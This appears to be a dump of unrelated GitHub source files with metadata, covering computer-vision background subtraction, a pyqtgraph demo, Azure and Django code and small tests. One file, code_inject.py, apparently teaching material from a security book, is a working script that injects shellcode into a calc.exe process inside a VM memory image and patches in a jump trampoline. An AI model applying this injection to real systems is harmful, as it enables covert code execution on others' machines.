AbstractBGModel.__init__(self, imageBuffer, thresh, soft_thresh)
def _computeBGDiff(self):
prevImg = self._imageBuffer[0].asMatrix2D()
curImg = self._imageBuffer.getMiddle().asMatrix2D()
nextImg = self._imageBuffer[-1].asMatrix2D()
delta1 = sp.absolute(curImg - prevImg) #frame diff 1
delta2 = sp.absolute(nextImg - curImg) #frame diff 2
#use element-wise minimum of the two difference images, which is what
# gets compared to threshold to yield foreground mask
return sp.minimum(delta1, delta2)
class MotionCompensatedFrameDifferencer(AbstractBGModel):
'''
This class represents a more sophisticated frame differencing
algorithm that takes into account potential camera motion, and
applies a registration method to align subsequent images prior
to frame subtraction.
'''
def __init__(self, imageBuffer, thresh=20, soft_thresh = False):
AbstractBGModel.__init__(self, imageBuffer, thresh, soft_thresh)
self._flow = pv.OpticalFlow()
if imageBuffer.isFull():
self._initFlow() #if a non-full buffer is given, then we
#must assume the caller will perform
#flow initiation when appropriate.
def _initFlow(self):
'''
Should be called after buffer is full to compute the optical flow
information on the buffered frames. Only needs to be called once,
prior to first call of _computeBGDiff(), because from then on,
the flow will be updated as new frames are added to the buffer.
'''
for i in range( len(self._imageBuffer)):
self._flow.update( self._imageBuffer[i])
def getOpticalFlow(self):
'''
@return: A handle to the pv.OpticalFlow object being used by this object.
'''
return self._flow
def setOpticalFlow(self, OF_Object):
'''
This is an optional method that allows the user to provide an
optical flow object (pv.OpticalFlow) with non-default settings.
@param OF_Object: The optical flow object desired for use in computing the
motion compensated frame difference.
'''
self._flow = OF_Object
def _computeBGDiff(self):
self._flow.update( self._imageBuffer.getLast() )
n = len(self._imageBuffer)
prev_im = self._imageBuffer[0]
forward = None
for i in range(0,n/2):
if forward == None:
forward = self._imageBuffer[i].to_next
else:
forward = forward * self._imageBuffer[i].to_next
w,h = size = prev_im.size
mask = cv.CreateImage(size,cv.IPL_DEPTH_8U,1)
cv.Set(mask,0)
interior = cv.GetSubRect(mask, pv.Rect(2,2,w-4,h-4).asOpenCV())
cv.Set(interior,255)
mask = pv.Image(mask)
prev_im = forward(prev_im)
prev_mask = forward(mask)
next_im = self._imageBuffer[n-1]
back = None
for i in range(n-1,n/2,-1):
if back == None:
back = self._imageBuffer[i].to_prev
else:
back = back * self._imageBuffer[i].to_prev
next_im = back(next_im)
next_mask = back(mask)
curr_im = self._imageBuffer[n/2]
prevImg = prev_im.asMatrix2D()
curImg = curr_im.asMatrix2D()
nextImg = next_im.asMatrix2D()
prevMask = prev_mask.asMatrix2D()
nextMask = next_mask.asMatrix2D()
# Compute transformed images
delta1 = sp.absolute(curImg - prevImg) #frame diff 1
delta2 = sp.absolute(nextImg - curImg) #frame diff 2
delta1 = sp.minimum(delta1,prevMask)
delta2 = sp.minimum(delta2,nextMask)
#use element-wise minimum of the two difference images, which is what
# gets compared to threshold to yield foreground mask
return sp.minimum(delta1, delta2)
class MedianFilter(AbstractBGModel):
'''
Uses median pixel values of the images in a buffer to
approximate a background model.
'''
def __init__(self, imageBuffer, thresh=20, soft_thresh = False):
AbstractBGModel.__init__(self, imageBuffer, thresh, soft_thresh)
def _getMedianVals(self):
'''
@return: A scipy matrix representing the gray-scale median values of the image stack.
If you want a pyvision image, just wrap the result in pv.Image(result).
'''
self._imageStack = self._imageBuffer.asStackBW()
medians = sp.median(self._imageStack, axis=0) #median of each pixel jet in stack
return medians
def _computeBGDiff(self):
imgGray = self._imageBuffer.getLast().asMatrix2D()
imgBG = self._getMedianVals()
return (imgGray - imgBG)
class ApproximateMedianFilter(MedianFilter):
'''
Approximates the median pixels via an efficient incremental algorithm that
would converge to the true median in a perfect world. It initializes a
median image based on the images in the initial image buffer, but
then only updates the median image using the last (newest) image in the
buffer.
'''
def __init__(self, imageBuffer, thresh=20, soft_thresh=False):
if not imageBuffer.isFull():
raise ValueError("Image Buffer must be full before initializing Approx. Median Filter.")
MedianFilter.__init__(self, imageBuffer, thresh, soft_thresh)
self._medians = self._getMedianVals()
def _updateMedian(self):
curImg = self._imageBuffer.getLast()
curMat = curImg.asMatrix2D()
median = self._medians
up = (curMat > median)*1.0
down = (curMat < median)*1.0
self._medians = self._medians + up - down
def _computeBGDiff(self):
self._updateMedian()
imgGray = self._imageBuffer.getLast().asMatrix2D()
imgBG = self._medians
return (imgGray - imgBG)
| {
"content_hash": "88e950567ed1151ca03174f5251d9144",
"timestamp": "",
"source": "github",
"line_count": 266,
"max_line_length": 100,
"avg_line_length": 40.357142857142854,
"alnum_prop": 0.6435957149510946,
"repo_name": "mikeseven/pyvision",
"id": "7f4c65157ef059c30fcb43c72242d41c89874ad3",
"size": "10735",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "src/pyvision/surveillance/BackgroundSubtraction.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1379814"
},
{
"name": "R",
"bytes": "1487"
},
{
"name": "Shell",
"bytes": "166"
}
],
"symlink_target": ""
} |
from akagi.content import Content
from akagi.iterator import Iterator
class LocalFileContent(Content):
is_local = True
def __init__(self, path, file_format='csv'):
self.path = path
self.file_format = file_format
self.iterator_class = Iterator.get_iterator_class(file_format)
def __iter__(self):
return self.iterator_class(self)
@property
def key(self):
return self.path
@property
def _body(self):
return open(self.path, 'rb')
| {
"content_hash": "0d43f0132dff70e5ed9be0388bf04df0",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 70,
"avg_line_length": 23.09090909090909,
"alnum_prop": 0.6358267716535433,
"repo_name": "ayemos/osho",
"id": "08e39389f57063d6893b64655595acf92ef2c52d",
"size": "508",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "akagi/contents/local_file_content.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2283"
},
{
"name": "Python",
"bytes": "21652"
}
],
"symlink_target": ""
} |
import sys
import struct
equals_button = 0x01005D51
memory_file = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"
slack_space = None
trampoline_offset = None
# read in our shellcode
sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close()
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
config.parse_options()
config.PROFILE = "Win2003SP2x86"
config.LOCATION = "file://%s" % memory_file
import volatility.plugins.taskmods as taskmods
p = taskmods.PSList(config)
for process in p.calculate():
if str(process.ImageFileName) == "calc.exe":
print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
print "[*] Hunting for physical offsets...please wait."
address_space = process.get_process_address_space()
pages = address_space.get_available_pages()
for page in pages:
physical = address_space.vtop(page[0])
if physical is not None:
if slack_space is None:
fd = open(memory_file,"r+")
fd.seek(physical)
buf = fd.read(page[1])
try:
offset = buf.index("\x00" * len(sc))
slack_space = page[0] + offset
print "[*] Found good shellcode location!"
print "[*] Virtual address: 0x%08x" % slack_space
print "[*] Physical address: 0x%08x" % (physical + offset)
print "[*] Injecting shellcode."
fd.seek(physical + offset)
fd.write(sc)
fd.flush()
# create our trampoline
tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
tramp += "\xff\xe3"
if trampoline_offset is not None:
break
except:
pass
fd.close()
# check for our target code location
if page[0] <= equals_button and equals_button < ((page[0] + page[1])-7):
# calculate virtual offset
v_offset = equals_button - page[0]
# now calculate physical offset
trampoline_offset = physical + v_offset
print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
if slack_space is not None:
break
print "[*] Writing trampoline..."
fd = open(memory_file, "r+")
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()
print "[*] Done injecting code."
| {
"content_hash": "a8472fd3c741aa34216537fb0b639bc8",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 160,
"avg_line_length": 33.0462962962963,
"alnum_prop": 0.4858503782572149,
"repo_name": "vdrey/Toolbox",
"id": "69d162f2eaeabe51fa6233fb83f4d61871cd5b41",
"size": "3569",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Python/BHP/BHP-Code/BHP-Code/Chapter11/code_inject.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1004"
},
{
"name": "HTML",
"bytes": "317"
},
{
"name": "Python",
"bytes": "372332"
}
],
"symlink_target": ""
} |
from django_cas_ng.backends import * # noqa
from django_cas_ng.decorators import * # noqa
from django_cas_ng.middleware import * # noqa
from django_cas_ng.models import * # noqa
from django_cas_ng.views import * # noqa
def test_nothing_is_on_fire():
# Nothing to do here, this file is used for testing import works.
pass
| {
"content_hash": "52b0948a878899e5315f6f6e8d2606fb",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 69,
"avg_line_length": 33.6,
"alnum_prop": 0.7142857142857143,
"repo_name": "mingchen/django-cas-ng",
"id": "64ed5ba487975028087698ea42c6cb99562ccd59",
"size": "336",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_smoke.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "373"
},
{
"name": "Python",
"bytes": "80167"
}
],
"symlink_target": ""
} |
import logging
from fuel_health import nmanager
LOG = logging.getLogger(__name__)
class SanityHeatTest(nmanager.SanityChecksTest):
"""Class contains tests that check basic Heat functionality.
Special requirements:
1. Heat component should be installed.
"""
def test_list_stacks(self):
"""Request stack list
Target component: Heat
Scenario:
1. Request the list of stacks.
Duration: 20 s.
"""
self.verify(20, self._list_stacks, 1,
'Stack list is unavailable. ',
"stack listing",
self.heat_client)
| {
"content_hash": "51efc0da65b601029d933c7df5c3db4f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 64,
"avg_line_length": 24.846153846153847,
"alnum_prop": 0.586687306501548,
"repo_name": "mcloudv/fuel-ostf",
"id": "9afcb162f421d7deba03c1fd7847bcbc117d1925",
"size": "1266",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fuel_health/tests/sanity/test_sanity_heat.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "404"
},
{
"name": "Python",
"bytes": "594650"
},
{
"name": "Shell",
"bytes": "6024"
}
],
"symlink_target": ""
} |
from msrest.serialization import Model
class JobEnableOptions(Model):
"""Additional parameters for enable operation.
:param timeout: The maximum time that the server can spend processing the
request, in seconds. The default is 30 seconds. Default value: 30 .
:type timeout: int
:param client_request_id: The caller-generated request identity, in the
form of a GUID with no decoration such as curly braces, e.g.
9C4D50EE-2D56-4CD3-8152-34347DC9F2B0.
:type client_request_id: str
:param return_client_request_id: Whether the server should return the
client-request-id in the response. Default value: False .
:type return_client_request_id: bool
:param ocp_date: The time the request was issued. Client libraries
typically set this to the current system clock time; set it explicitly if
you are calling the REST API directly.
:type ocp_date: datetime
:param if_match: An ETag value associated with the version of the resource
known to the client. The operation will be performed only if the
resource's current ETag on the service exactly matches the value specified
by the client.
:type if_match: str
:param if_none_match: An ETag value associated with the version of the
resource known to the client. The operation will be performed only if the
resource's current ETag on the service does not match the value specified
by the client.
:type if_none_match: str
:param if_modified_since: A timestamp indicating the last modified time of
the resource known to the client. The operation will be performed only if
the resource on the service has been modified since the specified time.
:type if_modified_since: datetime
:param if_unmodified_since: A timestamp indicating the last modified time
of the resource known to the client. The operation will be performed only
if the resource on the service has not been modified since the specified
time.
:type if_unmodified_since: datetime
"""
def __init__(self, timeout=30, client_request_id=None, return_client_request_id=False, ocp_date=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None):
self.timeout = timeout
self.client_request_id = client_request_id
self.return_client_request_id = return_client_request_id
self.ocp_date = ocp_date
self.if_match = if_match
self.if_none_match = if_none_match
self.if_modified_since = if_modified_since
self.if_unmodified_since = if_unmodified_since
| {
"content_hash": "444da5de0ce04c82def82ad6fef15c06",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 191,
"avg_line_length": 51.88,
"alnum_prop": 0.723207401696222,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "52157c07bc41e3d84ab0771074c59944eef072b9",
"size": "3068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-batch/azure/batch/models/job_enable_options.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser
class UserManager(BaseUserManager):
def create_user(self, yiban_id, password):
if not yiban_id:
raise ValueError("易班id不能为空")
user = self.model(
login_id=yiban_id,
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, yiban_id, password):
user = self.create_user(
yiban_id=yiban_id,
)
user.set_password(password)
user.is_admin = True
user.save()
return user
class User(AbstractBaseUser):
class Meta:
verbose_name = '用户(开发用)'
verbose_name_plural = '用户(开发用)'
MALE = "M"
FEMALE = "F"
UNKNOWN = 'U'
SEX_CHOICES = (
(FEMALE, "女"),
(MALE, "男"),
(UNKNOWN, "保密")
)
yiban_id = models.CharField(max_length=100, unique=True, verbose_name='易班id', null=False)
nickname = models.CharField(max_length=16, verbose_name='昵称')
sex = models.CharField(max_length=1, choices=SEX_CHOICES, default=UNKNOWN, verbose_name='性别')
is_admin = models.BooleanField(default=False, verbose_name='管理员')
USERNAME_FIELD = 'yiban_id'
objects = UserManager()
def get_full_name(self):
return self.nickname
def get_short_name(self):
return self.nickname
def __str__(self):
return self.nickname
def as_dict(self):
return dict(yiban_id=self.yiban_id, nickname=self.nickname, sex=self.sex)
@property
def is_authenticated(self):
return lambda: True
| {
"content_hash": "f580830ae526d4dc55748e7e3af76dae",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 97,
"avg_line_length": 25.84375,
"alnum_prop": 0.6088270858524788,
"repo_name": "trickTech/BRB",
"id": "4c0ff271d5f5b4cb42a5bad4ed0ce9a7f41cede6",
"size": "1716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "user/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "28404"
},
{
"name": "Shell",
"bytes": "61"
}
],
"symlink_target": ""
} |
"""
This example demonstrates the SpinBox widget, which is an extension of
QDoubleSpinBox providing some advanced features:
* SI-prefixed units
* Non-linear stepping modes
* Bounded/unbounded values
"""
import initExample ## Add path to library (just for examples; you do not need this)
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
import ast
app = QtGui.QApplication([])
spins = [
("Floating-point spin box, min=0, no maximum.",
pg.SpinBox(value=5.0, bounds=[0, None])),
("Integer spin box, dec stepping<br>(1-9, 10-90, 100-900, etc), decimals=4",
pg.SpinBox(value=10, int=True, dec=True, minStep=1, step=1, decimals=4)),
("Float with SI-prefixed units<br>(n, u, m, k, M, etc)",
pg.SpinBox(value=0.9, suffix='V', siPrefix=True)),
("Float with SI-prefixed units,<br>dec step=0.1, minStep=0.1",
pg.SpinBox(value=1.0, suffix='V', siPrefix=True, dec=True, step=0.1, minStep=0.1)),
("Float with SI-prefixed units,<br>dec step=0.5, minStep=0.01",
pg.SpinBox(value=1.0, suffix='V', siPrefix=True, dec=True, step=0.5, minStep=0.01)),
("Float with SI-prefixed units,<br>dec step=1.0, minStep=0.001",
pg.SpinBox(value=1.0, suffix='V', siPrefix=True, dec=True, step=1.0, minStep=0.001)),
("Float with custom formatting",
pg.SpinBox(value=23.07, format='${value:0.02f}',
regex='\$?(?P<number>(-?\d+(\.\d+)?)|(-?\.\d+))$')),
("Int with custom formatting",
pg.SpinBox(value=4567, step=1, int=True, bounds=[0,None], format='0x{value:X}',
regex='(0x)?(?P<number>[0-9a-fA-F]+)$',
evalFunc=lambda s: ast.literal_eval('0x'+s))),
("Integer with bounds=[10, 20] and wrapping",
pg.SpinBox(value=10, bounds=[10, 20], int=False, minStep=1, step=1, wrapping=True)),
]
win = QtGui.QMainWindow()
win.setWindowTitle('pyqtgraph example: SpinBox')
cw = QtGui.QWidget()
layout = QtGui.QGridLayout()
cw.setLayout(layout)
win.setCentralWidget(cw)
win.show()
#win.resize(300, 600)
changingLabel = QtGui.QLabel() ## updated immediately
changedLabel = QtGui.QLabel() ## updated only when editing is finished or mouse wheel has stopped for 0.3sec
changingLabel.setMinimumWidth(200)
font = changingLabel.font()
font.setBold(True)
font.setPointSize(14)
changingLabel.setFont(font)
changedLabel.setFont(font)
labels = []
def valueChanged(sb):
changedLabel.setText("Final value: %s" % str(sb.value()))
def valueChanging(sb, value):
changingLabel.setText("Value changing: %s" % str(sb.value()))
for text, spin in spins:
label = QtGui.QLabel(text)
labels.append(label)
layout.addWidget(label)
layout.addWidget(spin)
spin.sigValueChanged.connect(valueChanged)
spin.sigValueChanging.connect(valueChanging)
layout.addWidget(changingLabel, 0, 1)
layout.addWidget(changedLabel, 2, 1)
#def mkWin():
#win = QtGui.QMainWindow()
#g = QtGui.QFormLayout()
#w = QtGui.QWidget()
#w.setLayout(g)
#win.setCentralWidget(w)
#s1 = SpinBox(value=5, step=0.1, bounds=[-1.5, None], suffix='units')
#t1 = QtGui.QLineEdit()
#g.addRow(s1, t1)
#s2 = SpinBox(value=10e-6, dec=True, step=0.1, minStep=1e-6, suffix='A', siPrefix=True)
#t2 = QtGui.QLineEdit()
#g.addRow(s2, t2)
#s3 = SpinBox(value=1000, dec=True, step=0.5, minStep=1e-6, bounds=[1, 1e9], suffix='Hz', siPrefix=True)
#t3 = QtGui.QLineEdit()
#g.addRow(s3, t3)
#s4 = SpinBox(int=True, dec=True, step=1, minStep=1, bounds=[-10, 1000])
#t4 = QtGui.QLineEdit()
#g.addRow(s4, t4)
#win.show()
#import sys
#for sb in [s1, s2, s3,s4]:
##QtCore.QObject.connect(sb, QtCore.SIGNAL('valueChanged(double)'), lambda v: sys.stdout.write(str(sb) + " valueChanged\n"))
##QtCore.QObject.connect(sb, QtCore.SIGNAL('editingFinished()'), lambda: sys.stdout.write(str(sb) + " editingFinished\n"))
#sb.sigValueChanged.connect(valueChanged)
#sb.sigValueChanging.connect(valueChanging)
#sb.editingFinished.connect(lambda: sys.stdout.write(str(sb) + " editingFinished\n"))
#return win, w, [s1, s2, s3, s4]
#a = mkWin()
#def test(n=100):
#for i in range(n):
#win, w, sb = mkWin()
#for s in sb:
#w.setParent(None)
#s.setParent(None)
#s.valueChanged.disconnect()
#s.editingFinished.disconnect()
## Start Qt event loop unless running in interactive mode or using pyside.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| {
"content_hash": "55ea1ceeeb69bde735e96c945f987b89",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 132,
"avg_line_length": 35.646153846153844,
"alnum_prop": 0.6486836426413466,
"repo_name": "pmaunz/pyqtgraph",
"id": "2faf10eec8ef04c09beacec602ace44c2027acc5",
"size": "4658",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "examples/SpinBox.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "1752"
},
{
"name": "Python",
"bytes": "2125387"
}
],
"symlink_target": ""
} |
import hashlib
import sys
import time
from django.conf import settings
from django.db.utils import load_backend
from django.utils.encoding import force_bytes
from django.utils.functional import cached_property
from django.utils.six.moves import input
from .utils import truncate_name
# The prefix to put on the default database name when creating
# the test database.
TEST_DATABASE_PREFIX = 'test_'
NO_DB_ALIAS = '__no_db__'
class BaseDatabaseCreation(object):
"""
This class encapsulates all backend-specific differences that pertain to
database *creation*, such as the column types to use for particular Django
Fields, the SQL used to create and destroy tables, and the creation and
destruction of test databases.
"""
data_types = {}
data_types_suffix = {}
data_type_check_constraints = {}
def __init__(self, connection):
self.connection = connection
@cached_property
def _nodb_connection(self):
"""
Alternative connection to be used when there is no need to access
the main database, specifically for test db creation/deletion.
This also prevents the production database from being exposed to
potential child threads while (or after) the test database is destroyed.
Refs #10868, #17786, #16969.
"""
settings_dict = self.connection.settings_dict.copy()
settings_dict['NAME'] = None
backend = load_backend(settings_dict['ENGINE'])
nodb_connection = backend.DatabaseWrapper(
settings_dict,
alias=NO_DB_ALIAS,
allow_thread_sharing=False)
return nodb_connection
@classmethod
def _digest(cls, *args):
"""
Generates a 32-bit digest of a set of arguments that can be used to
shorten identifying names.
"""
h = hashlib.md5()
for arg in args:
h.update(force_bytes(arg))
return h.hexdigest()[:8]
def sql_create_model(self, model, style, known_models=set()):
"""
Returns the SQL required to create a single model, as a tuple of:
(list_of_sql, pending_references_dict)
"""
opts = model._meta
if not opts.managed or opts.proxy or opts.swapped:
return [], {}
final_output = []
table_output = []
pending_references = {}
qn = self.connection.ops.quote_name
for f in opts.local_fields:
col_type = f.db_type(connection=self.connection)
col_type_suffix = f.db_type_suffix(connection=self.connection)
tablespace = f.db_tablespace or opts.db_tablespace
if col_type is None:
# Skip ManyToManyFields, because they're not represented as
# database columns in this table.
continue
# Make the definition (e.g. 'foo VARCHAR(30)') for this field.
field_output = [style.SQL_FIELD(qn(f.column)),
style.SQL_COLTYPE(col_type)]
# Oracle treats the empty string ('') as null, so coerce the null
# option whenever '' is a possible value.
null = f.null
if (f.empty_strings_allowed and not f.primary_key and
self.connection.features.interprets_empty_strings_as_nulls):
null = True
if not null:
field_output.append(style.SQL_KEYWORD('NOT NULL'))
if f.primary_key:
field_output.append(style.SQL_KEYWORD('PRIMARY KEY'))
elif f.unique:
field_output.append(style.SQL_KEYWORD('UNIQUE'))
if tablespace and f.unique:
# We must specify the index tablespace inline, because we
# won't be generating a CREATE INDEX statement for this field.
tablespace_sql = self.connection.ops.tablespace_sql(
tablespace, inline=True)
if tablespace_sql:
field_output.append(tablespace_sql)
if f.rel and f.db_constraint:
ref_output, pending = self.sql_for_inline_foreign_key_references(
model, f, known_models, style)
if pending:
pending_references.setdefault(f.rel.to, []).append(
(model, f))
else:
field_output.extend(ref_output)
if col_type_suffix:
field_output.append(style.SQL_KEYWORD(col_type_suffix))
table_output.append(' '.join(field_output))
for field_constraints in opts.unique_together:
table_output.append(style.SQL_KEYWORD('UNIQUE') + ' (%s)' %
", ".join(
[style.SQL_FIELD(qn(opts.get_field(f).column))
for f in field_constraints]))
full_statement = [style.SQL_KEYWORD('CREATE TABLE') + ' ' +
style.SQL_TABLE(qn(opts.db_table)) + ' (']
for i, line in enumerate(table_output): # Combine and add commas.
full_statement.append(
' %s%s' % (line, ',' if i < len(table_output) - 1 else ''))
full_statement.append(')')
if opts.db_tablespace:
tablespace_sql = self.connection.ops.tablespace_sql(
opts.db_tablespace)
if tablespace_sql:
full_statement.append(tablespace_sql)
full_statement.append(';')
final_output.append('\n'.join(full_statement))
if opts.has_auto_field:
# Add any extra SQL needed to support auto-incrementing primary
# keys.
auto_column = opts.auto_field.db_column or opts.auto_field.name
autoinc_sql = self.connection.ops.autoinc_sql(opts.db_table,
auto_column)
if autoinc_sql:
for stmt in autoinc_sql:
final_output.append(stmt)
return final_output, pending_references
def sql_for_inline_foreign_key_references(self, model, field, known_models, style):
"""
Return the SQL snippet defining the foreign key reference for a field.
"""
qn = self.connection.ops.quote_name
rel_to = field.rel.to
if rel_to in known_models or rel_to == model:
output = [style.SQL_KEYWORD('REFERENCES') + ' ' +
style.SQL_TABLE(qn(rel_to._meta.db_table)) + ' (' +
style.SQL_FIELD(qn(rel_to._meta.get_field(
field.rel.field_name).column)) + ')' +
self.connection.ops.deferrable_sql()
]
pending = False
else:
# We haven't yet created the table to which this field
# is related, so save it for later.
output = []
pending = True
return output, pending
def sql_for_pending_references(self, model, style, pending_references):
"""
Returns any ALTER TABLE statements to add constraints after the fact.
"""
opts = model._meta
if not opts.managed or opts.swapped:
return []
qn = self.connection.ops.quote_name
final_output = []
if model in pending_references:
for rel_class, f in pending_references[model]:
rel_opts = rel_class._meta
r_table = rel_opts.db_table
r_col = f.column
table = opts.db_table
col = opts.get_field(f.rel.field_name).column
# For MySQL, r_name must be unique in the first 64 characters.
# So we are careful with character usage here.
r_name = '%s_refs_%s_%s' % (
r_col, col, self._digest(r_table, table))
final_output.append(style.SQL_KEYWORD('ALTER TABLE') +
' %s ADD CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s (%s)%s;' %
(qn(r_table), qn(truncate_name(
r_name, self.connection.ops.max_name_length())),
qn(r_col), qn(table), qn(col),
self.connection.ops.deferrable_sql()))
del pending_references[model]
return final_output
def sql_indexes_for_model(self, model, style):
"""
Returns the CREATE INDEX SQL statements for a single model.
"""
if not model._meta.managed or model._meta.proxy or model._meta.swapped:
return []
output = []
for f in model._meta.local_fields:
output.extend(self.sql_indexes_for_field(model, f, style))
for fs in model._meta.index_together:
fields = [model._meta.get_field_by_name(f)[0] for f in fs]
output.extend(self.sql_indexes_for_fields(model, fields, style))
return output
def sql_indexes_for_field(self, model, f, style):
"""
Return the CREATE INDEX SQL statements for a single model field.
"""
if f.db_index and not f.unique:
return self.sql_indexes_for_fields(model, [f], style)
else:
return []
def sql_indexes_for_fields(self, model, fields, style):
if len(fields) == 1 and fields[0].db_tablespace:
tablespace_sql = self.connection.ops.tablespace_sql(fields[0].db_tablespace)
elif model._meta.db_tablespace:
tablespace_sql = self.connection.ops.tablespace_sql(model._meta.db_tablespace)
else:
tablespace_sql = ""
if tablespace_sql:
tablespace_sql = " " + tablespace_sql
field_names = []
qn = self.connection.ops.quote_name
for f in fields:
field_names.append(style.SQL_FIELD(qn(f.column)))
index_name = "%s_%s" % (model._meta.db_table, self._digest([f.name for f in fields]))
return [
style.SQL_KEYWORD("CREATE INDEX") + " " +
style.SQL_TABLE(qn(truncate_name(index_name, self.connection.ops.max_name_length()))) + " " +
style.SQL_KEYWORD("ON") + " " +
style.SQL_TABLE(qn(model._meta.db_table)) + " " +
"(%s)" % style.SQL_FIELD(", ".join(field_names)) +
"%s;" % tablespace_sql,
]
def sql_destroy_model(self, model, references_to_delete, style):
"""
Return the DROP TABLE and restraint dropping statements for a single
model.
"""
if not model._meta.managed or model._meta.proxy or model._meta.swapped:
return []
# Drop the table now
qn = self.connection.ops.quote_name
output = ['%s %s;' % (style.SQL_KEYWORD('DROP TABLE'),
style.SQL_TABLE(qn(model._meta.db_table)))]
if model in references_to_delete:
output.extend(self.sql_remove_table_constraints(
model, references_to_delete, style))
if model._meta.has_auto_field:
ds = self.connection.ops.drop_sequence_sql(model._meta.db_table)
if ds:
output.append(ds)
return output
def sql_remove_table_constraints(self, model, references_to_delete, style):
if not model._meta.managed or model._meta.proxy or model._meta.swapped:
return []
output = []
qn = self.connection.ops.quote_name
for rel_class, f in references_to_delete[model]:
table = rel_class._meta.db_table
col = f.column
r_table = model._meta.db_table
r_col = model._meta.get_field(f.rel.field_name).column
r_name = '%s_refs_%s_%s' % (
col, r_col, self._digest(table, r_table))
output.append('%s %s %s %s;' % (
style.SQL_KEYWORD('ALTER TABLE'),
style.SQL_TABLE(qn(table)),
style.SQL_KEYWORD(self.connection.ops.drop_foreignkey_sql()),
style.SQL_FIELD(qn(truncate_name(
r_name, self.connection.ops.max_name_length())))
))
del references_to_delete[model]
return output
def sql_destroy_indexes_for_model(self, model, style):
"""
Returns the DROP INDEX SQL statements for a single model.
"""
if not model._meta.managed or model._meta.proxy or model._meta.swapped:
return []
output = []
for f in model._meta.local_fields:
output.extend(self.sql_destroy_indexes_for_field(model, f, style))
for fs in model._meta.index_together:
fields = [model._meta.get_field_by_name(f)[0] for f in fs]
output.extend(self.sql_destroy_indexes_for_fields(model, fields, style))
return output
def sql_destroy_indexes_for_field(self, model, f, style):
"""
Return the DROP INDEX SQL statements for a single model field.
"""
if f.db_index and not f.unique:
return self.sql_destroy_indexes_for_fields(model, [f], style)
else:
return []
def sql_destroy_indexes_for_fields(self, model, fields, style):
if len(fields) == 1 and fields[0].db_tablespace:
tablespace_sql = self.connection.ops.tablespace_sql(fields[0].db_tablespace)
elif model._meta.db_tablespace:
tablespace_sql = self.connection.ops.tablespace_sql(model._meta.db_tablespace)
else:
tablespace_sql = ""
if tablespace_sql:
tablespace_sql = " " + tablespace_sql
field_names = []
qn = self.connection.ops.quote_name
for f in fields:
field_names.append(style.SQL_FIELD(qn(f.column)))
index_name = "%s_%s" % (model._meta.db_table, self._digest([f.name for f in fields]))
return [
style.SQL_KEYWORD("DROP INDEX") + " " +
style.SQL_TABLE(qn(truncate_name(index_name, self.connection.ops.max_name_length()))) + " " +
";",
]
def create_test_db(self, verbosity=1, autoclobber=False):
"""
Creates a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
# Don't import django.core.management if it isn't needed.
from django.core.management import call_command
test_database_name = self._get_test_db_name()
if verbosity >= 1:
test_db_repr = ''
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
print("Creating test database for alias '%s'%s..." % (
self.connection.alias, test_db_repr))
self._create_test_db(verbosity, autoclobber)
self.connection.close()
settings.DATABASES[self.connection.alias]["NAME"] = test_database_name
self.connection.settings_dict["NAME"] = test_database_name
# Report migrate messages at one level lower than that requested.
# This ensures we don't get flooded with messages during testing
# (unless you really ask to be flooded)
call_command('migrate',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias,
load_initial_data=False,
test_database=True)
# We need to then do a flush to ensure that any data installed by
# custom SQL has been removed. The only test data should come from
# test fixtures, or autogenerated from post_migrate triggers.
# This has the side effect of loading initial data (which was
# intentionally skipped in the syncdb).
call_command('flush',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias)
call_command('createcachetable', database=self.connection.alias)
# Ensure a connection for the side effect of initializing the test database.
